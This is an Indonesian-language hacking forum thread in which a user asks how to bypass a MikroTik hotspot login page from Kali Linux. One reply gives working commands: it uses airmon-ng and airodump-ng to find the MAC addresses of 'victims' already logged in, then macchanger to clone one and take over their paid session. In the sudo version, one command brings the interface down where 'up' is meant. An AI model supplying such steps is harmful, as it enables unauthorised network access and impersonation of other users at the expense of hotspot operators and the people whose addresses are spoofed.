[ASK] bypass mikrotik with kali linux and tuneling
eehhhmmmm....
ane bingung sebenernye mau post ϑɪ mana,ϑɪ sini atau ϑɪ sub forum kali linux, cara clone ip & mac ane gak bisa ϑɪ kali linux, krna menurut ane setting IP manual kali yang GUI lebih ribet dari backtrack (wicd) dan menurut trit d suatu forum bisa juga bypass mikrotik dengan ssh/tunneling, ane lupa tutornya dah kehapus n entah itu work ayu enggak...
oiya ane minta maaf kalo ada yang salah, coz alamat: forum.indonesianbacktrack.or.id/showthread.php?tid=1 gak bisa d buka.. jdi gak bisa liat rules forum...
maaf ya..
thx before.. :)
Read.. Read.. And Read again..!!

Maaf om saya gak bisa bantu coz gak pernah main cloning-cloning mac Big Grin

udah dipindah om bukan di ini lagi http://indonesianbacktrack.or.id/forum/s....php?tid=1
tapi disini http://indonesianbacktrack.or.id/forum/s....php?tid=1
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

bypass mikrotik buat konek inet atau mssuk ke routernya nih bro bingung

(07-30-2013, 08:48 AM)bintanGelap19 Wrote: eehhhmmmm....
ane bingung sebenernye mau post ϑɪ mana,ϑɪ sini atau ϑɪ sub forum kali linux, cara clone ip & mac ane gak bisa ϑɪ kali linux, krna menurut ane setting IP manual kali yang GUI lebih ribet dari backtrack (wicd) dan menurut trit d suatu forum bisa juga bypass mikrotik dengan ssh/tunneling, ane lupa tutornya dah kehapus n entah itu work ayu enggak...
oiya ane minta maaf kalo ada yang salah, coz alamat: forum.indonesianbacktrack.or.id/showthread.php?tid=1 gak bisa d buka.. jdi gak bisa liat rules forum...
maaf ya..
thx before.. Smile

hehe itu alamat lawas om. Big Grin .

wajar lah kalo setting ip di kali linux agak ribet. tapi pasti terbiasa kok. kan ada gnome-network-manager

soal cracking mikrotik ane ga tau tuh. mungkin bisa Big Grin

(07-30-2013, 08:48 AM)bintanGelap19 Wrote: eehhhmmmm....
maaf ya..
thx before.. Smile

Welcome om, Smile btw kalo yang untuk om maksud bypass disini untuk membypass login page client pada mikrotik, menurut pengalaman ane sejauh ini sih begini :

Code:
ifconfig wlan0 down
macchanger -m (macaddress-korban) wlan0
ifconfig wlan0 up

kalo seandainya om makenya di user ($), om tinggal tambahin aja sudo, contohnya
Code:
sudo ifconfig wlan0 down
sudo macchanger -m (macaddress-korban) wlan0
sudo ifconfig wlan0 down
atau cara yang lebih cepet
Code:
ifconfig wlan0 down && macchanger -m (maccaddress-korban) wlan0 && ifconfig wlan0 up

kalo om bingung mau nentuin mana sih mac korban yang lagi aktif berinternetan di page login tersebut ? bisa om gunain monitoring untuk melihat korbannya, contohnya begini

Code:
airmon-ng wlan0 start
airodump-ng mon0
=====================
nah dari cara ini om bisa melihat bssid dan mac korban yang lagi aktif berinternetan, copy paste deh ke command tadi. Dan Binggo !! :D

tapi kalo yang om maksud bukan begitu ya.. maaf :*
hehehehehe........
Quote:~ Tan Hana Wighna Tan Sirna ~

all sory ya..
g̲̮̲̅͡åк̲̮̲̅͡ pernah nongol...
jrang maen k forum, jarang ngublek" lepy juga...
mkasih yg dah bantuin... Big Grin
Read.. Read.. And Read again..!!